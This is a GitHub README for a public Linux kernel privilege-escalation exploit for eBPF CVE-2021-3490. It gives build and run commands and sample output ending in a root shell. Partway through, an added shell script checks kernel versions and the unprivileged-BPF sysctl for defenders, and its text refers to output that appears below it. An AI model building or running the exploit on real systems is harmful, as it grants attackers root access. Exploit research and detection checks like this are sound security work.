GitHub - chompie1337/Linux_LPE_eBPF_CVE-2021-3490
source link: https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490
Linux_LPE_eBPF_CVE-2021-3490
LPE exploit for CVE-2021-3490. Tested on Ubuntu 20.10 (Groovy Gorilla) kernels 5.8.0-25.26 through 5.8.0-52.58, and on Ubuntu 21.04 (Hirsute Hippo) kernel 5.11.0-16.17. The vulnerability was discovered by Manfred Paul @_manfp and fixed in this commit.
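A defender-side check, added here and not part of chompie1337's repository: it classifies a `uname -r` style release string against the kernel versions the README lists as tested, and reports the `kernel.unprivileged_bpf_disabled` sysctl, which decides whether an unprivileged process can create eBPF maps and load programs at all (the "[+] eBPF enabled, maps created!" step above depends on that). The function names, the comparison on the Ubuntu ABI number only (the ".26"/".58" upload number is not part of `uname -r`), and the sample strings are my own assumptions.

```sh
#!/bin/sh
# Added example, not code from the Linux_LPE_eBPF_CVE-2021-3490 repository.
# Assumes Ubuntu-style release strings such as "5.8.0-52-generic":
# <base version>-<ABI number>-<flavour>. Only base version and ABI number
# are compared against the ranges the README lists as tested.

# in_tested_range <release string>
# Prints "tested" when the string matches a kernel the README lists as tested
# (5.8.0 ABI 25..52 on Groovy, 5.11.0 ABI 16 on Hirsute), "other" otherwise.
in_tested_range() {
    rel="$1"
    base="${rel%%-*}"   # e.g. 5.8.0
    rest="${rel#*-}"    # e.g. 52-generic (unchanged if there is no dash)
    abi="${rest%%-*}"   # e.g. 52

    # Reject anything whose ABI field is not a plain integer.
    case "$abi" in
        ''|*[!0-9]*) echo "other"; return 0 ;;
    esac

    case "$base" in
        5.8.0)
            if [ "$abi" -ge 25 ] && [ "$abi" -le 52 ]; then
                echo "tested"; return 0
            fi ;;
        5.11.0)
            if [ "$abi" -eq 16 ]; then
                echo "tested"; return 0
            fi ;;
    esac
    echo "other"
}

# unprivileged_bpf_status
# Reads /proc/sys/kernel/unprivileged_bpf_disabled and prints a one-line
# summary. 0 means unprivileged users may use bpf(2); any non-zero value
# means they may not, which blocks the first step of the chain shown above.
unprivileged_bpf_status() {
    f=/proc/sys/kernel/unprivileged_bpf_disabled
    if [ -r "$f" ]; then
        v=$(cat "$f")
        case "$v" in
            0) echo "unprivileged BPF allowed (value 0)" ;;
            *) echo "unprivileged BPF disabled (value $v)" ;;
        esac
    else
        echo "sysctl not readable (non-Linux host or no BPF support)"
    fi
}

# Stand-alone run: classify the running kernel and report the sysctl.
if [ "${0##*/}" != "sh" ] && [ "${0##*/}" != "bash" ]; then
    echo "kernel $(uname -r): $(in_tested_range "$(uname -r)")"
    unprivileged_bpf_status
fi
```

Run it on a host as `sh check.sh`; a result of "tested" together with "unprivileged BPF allowed" is the combination worth acting on first, since disabling unprivileged BPF removes the entry point even before the kernel is patched.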
author: @chompie1337
For educational/research purposes only. Use at your own risk.
Usage:
To build for Ubuntu 20.10 (Groovy Gorilla):
make groovy
To build for Ubuntu 21.04 (Hirsute Hippo):
make hirsute
To run:
bin/exploit.bin
[+] eBPF enabled, maps created!
[+] addr of oob BPF array map: ffffa008c1202110
[+] addr of array_map_ops: ffffffff956572a0
[+] kernel read successful!
[!] searching for init_pid_ns in kstrtab ...
[+] addr of init_pid_ns in kstrtab: ffffffff95b03a4a
[!] searching for init_pid_ns in ksymtab...
[+] addr of init_pid_ns ffffffff96062d00
[!] searching for creds for pid: 770
[+] addr of cred structure: ffffa0086758dec0
[!] preparing to overwrite creds...
[+] success! enjoy r00t :)
#
Note: You must cleanly exit the root shell by typing exit
to perform cleanup and avoid a kernel panic.
Check out the writeup Kernel Pwning with eBPF: a Love Story.
This research was sponsored by Grapl.